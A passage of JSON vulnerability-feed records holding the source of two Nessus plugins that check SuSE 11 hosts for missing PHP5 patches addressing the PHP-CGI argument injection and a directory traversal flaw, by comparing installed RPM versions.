"p-cpe:/a:novell:suse_linux:11:php53-suhosin", "p-cpe:/a:novell:suse_linux:11:php53-sysvmsg", "p-cpe:/a:novell:suse_linux:11:php53-odbc", "p-cpe:/a:novell:suse_linux:11:php53-ldap", "p-cpe:/a:novell:suse_linux:11:php53-gd", "p-cpe:/a:novell:suse_linux:11:php53-xsl", "p-cpe:/a:novell:suse_linux:11:php53-ctype", "p-cpe:/a:novell:suse_linux:11:php53-pear", "p-cpe:/a:novell:suse_linux:11:php53-bcmath", "p-cpe:/a:novell:suse_linux:11:php53-pcntl", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:php53-dom", "p-cpe:/a:novell:suse_linux:11:php53-openssl", "p-cpe:/a:novell:suse_linux:11:php53-mbstring", "p-cpe:/a:novell:suse_linux:11:php53-intl", "p-cpe:/a:novell:suse_linux:11:php53-xmlrpc", "p-cpe:/a:novell:suse_linux:11:php53-sysvsem", "p-cpe:/a:novell:suse_linux:11:php53-iconv", "p-cpe:/a:novell:suse_linux:11:php53-pspell", "p-cpe:/a:novell:suse_linux:11:php53-exif", "p-cpe:/a:novell:suse_linux:11:php53-pdo", 
"p-cpe:/a:novell:suse_linux:11:php53-tokenizer", "p-cpe:/a:novell:suse_linux:11:php53-zip", "p-cpe:/a:novell:suse_linux:11:php53-dba", "p-cpe:/a:novell:suse_linux:11:php53-fastcgi", "p-cpe:/a:novell:suse_linux:11:apache2-mod_php53", "p-cpe:/a:novell:suse_linux:11:php53-pgsql", "p-cpe:/a:novell:suse_linux:11:php53-xmlreader", "p-cpe:/a:novell:suse_linux:11:php53-gmp", "p-cpe:/a:novell:suse_linux:11:php53-mcrypt", "p-cpe:/a:novell:suse_linux:11:php53", "p-cpe:/a:novell:suse_linux:11:php53-json", "p-cpe:/a:novell:suse_linux:11:php53-shmop", "p-cpe:/a:novell:suse_linux:11:php53-gettext", "p-cpe:/a:novell:suse_linux:11:php53-snmp"], "id": "SUSE_11_APACHE2-MOD_PHP53-120504.NASL", "href": "https://www.tenable.com/plugins/nessus/64103", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64103);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-1172\", \"CVE-2012-1823\", \"CVE-2012-2311\");\n\n script_name(english:\"SuSE 11.2 Security Update : PHP5 (SAT Patch Number 6251)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in PHP5 :\n\n - A directory traversal bug has been fixed in PHP5.\n (CVE-2012-1172)\n\n - A command injection was possible when PHP5 was operated\n in CGI mode using commandline options. 
This problem does\n not affect PHP5 in the normal Apache module mode setup.\n (CVE-2012-1823 / CVE-2012-2311)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=752030\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=760536\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-1172.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-1823.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2311.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 6251.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-mod_php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-bz2\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-odbc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:11:php53-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php53-zlib\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 2) audit(AUDIT_OS_NOT, \"SuSE 11.2\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"apache2-mod_php53-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-bcmath-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-bz2-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-calendar-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-ctype-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, 
reference:\"php53-curl-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-dba-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-dom-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-exif-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-fastcgi-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-fileinfo-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-ftp-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-gd-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-gettext-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-gmp-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-iconv-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-intl-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-json-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-ldap-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-mbstring-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-mcrypt-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-mysql-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-odbc-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-openssl-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-pcntl-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-pdo-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-pear-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, 
reference:\"php53-pgsql-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-pspell-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-shmop-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-snmp-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-soap-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-suhosin-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-sysvmsg-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-sysvsem-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-sysvshm-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-tokenizer-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-wddx-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-xmlreader-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-xmlrpc-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-xmlwriter-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-xsl-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-zip-5.3.8-0.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"php53-zlib-5.3.8-0.27.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T14:37:33", "description": "This update fixes several security issues in PHP5 :\n\n - A directory traversal bug has been fixed in PHP5.\n (CVE-2012-1172)\n\n - A command injection was possible when PHP5 was operated\n in CGI 
mode, because a query string could be passed to\n PHP-CGI as command-line options. This problem does\n not affect PHP5 in the normal Apache module mode setup.\n (CVE-2012-1823 / CVE-2012-2311)\n\n - Also, a pack/unpack bug on big-endian 64-bit\n architectures (ppc64 and s390x) has been fixed.\n (bnc#753778)", "edition": 18, "published": "2013-01-25T00:00:00", "title": "SuSE 11.1 Security Update : PHP5 (SAT Patch Number 6252)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-1172"], "modified": "2013-01-25T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:php5-mysql", "p-cpe:/a:novell:suse_linux:11:php5-bcmath", "p-cpe:/a:novell:suse_linux:11:php5-json", "p-cpe:/a:novell:suse_linux:11:php5-zlib", "p-cpe:/a:novell:suse_linux:11:php5-dbase", "p-cpe:/a:novell:suse_linux:11:php5-soap", "p-cpe:/a:novell:suse_linux:11:php5-pgsql", "p-cpe:/a:novell:suse_linux:11:php5-bz2", "p-cpe:/a:novell:suse_linux:11:php5-gd", "p-cpe:/a:novell:suse_linux:11:php5-suhosin", "p-cpe:/a:novell:suse_linux:11:php5-mcrypt", "p-cpe:/a:novell:suse_linux:11:php5-dom", "p-cpe:/a:novell:suse_linux:11:php5-sysvshm", "p-cpe:/a:novell:suse_linux:11:php5-gmp", "p-cpe:/a:novell:suse_linux:11:php5-pdo", "p-cpe:/a:novell:suse_linux:11:php5-fastcgi", "p-cpe:/a:novell:suse_linux:11:php5-ldap", "p-cpe:/a:novell:suse_linux:11:php5-mbstring", "p-cpe:/a:novell:suse_linux:11:php5-odbc", "p-cpe:/a:novell:suse_linux:11:php5-dba", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:php5-openssl", "p-cpe:/a:novell:suse_linux:11:php5-tokenizer", "p-cpe:/a:novell:suse_linux:11:php5-pspell", "p-cpe:/a:novell:suse_linux:11:php5-zip", "p-cpe:/a:novell:suse_linux:11:php5-gettext", "p-cpe:/a:novell:suse_linux:11:php5-ctype", "p-cpe:/a:novell:suse_linux:11:php5-sysvmsg", "p-cpe:/a:novell:suse_linux:11:php5", "p-cpe:/a:novell:suse_linux:11:apache2-mod_php5", "p-cpe:/a:novell:suse_linux:11:php5-snmp", "p-cpe:/a:novell:suse_linux:11:php5-wddx", "p-cpe:/a:novell:suse_linux:11:php5-pcntl", 
"p-cpe:/a:novell:suse_linux:11:php5-xmlrpc", "p-cpe:/a:novell:suse_linux:11:php5-hash", "p-cpe:/a:novell:suse_linux:11:php5-exif", "p-cpe:/a:novell:suse_linux:11:php5-sysvsem", "p-cpe:/a:novell:suse_linux:11:php5-pear", "p-cpe:/a:novell:suse_linux:11:php5-calendar", "p-cpe:/a:novell:suse_linux:11:php5-xsl", "p-cpe:/a:novell:suse_linux:11:php5-curl", "p-cpe:/a:novell:suse_linux:11:php5-xmlreader", "p-cpe:/a:novell:suse_linux:11:php5-shmop", "p-cpe:/a:novell:suse_linux:11:php5-xmlwriter", "p-cpe:/a:novell:suse_linux:11:php5-iconv", "p-cpe:/a:novell:suse_linux:11:php5-ftp"], "id": "SUSE_11_APACHE2-MOD_PHP5-120504.NASL", "href": "https://www.tenable.com/plugins/nessus/64099", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64099);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-1172\", \"CVE-2012-1823\", \"CVE-2012-2311\");\n\n script_name(english:\"SuSE 11.1 Security Update : PHP5 (SAT Patch Number 6252)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in PHP5 :\n\n - A directory traversal bug has been fixed in PHP5.\n (CVE-2012-1172)\n\n - A command injection was possible when PHP5 was operated\n in CGI mode using commandline options. 
This problem does\n not affect PHP5 in the normal apache module mode setup.\n (CVE-2012-1823 / CVE-2012-2311)\n\n - Also a pack/unpacking bug on big endian 64bit\n architectures (ppc64 and s390x) has been fixed.\n (bnc#753778)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=752030\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=753778\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=760536\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-1172.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-1823.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2311.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 6252.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:11:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:11:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xsl\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-mod_php5-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-bcmath-5.2.14-0.7.30.38.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-bz2-5.2.14-0.7.30.38.1\")) flag++;\nif 
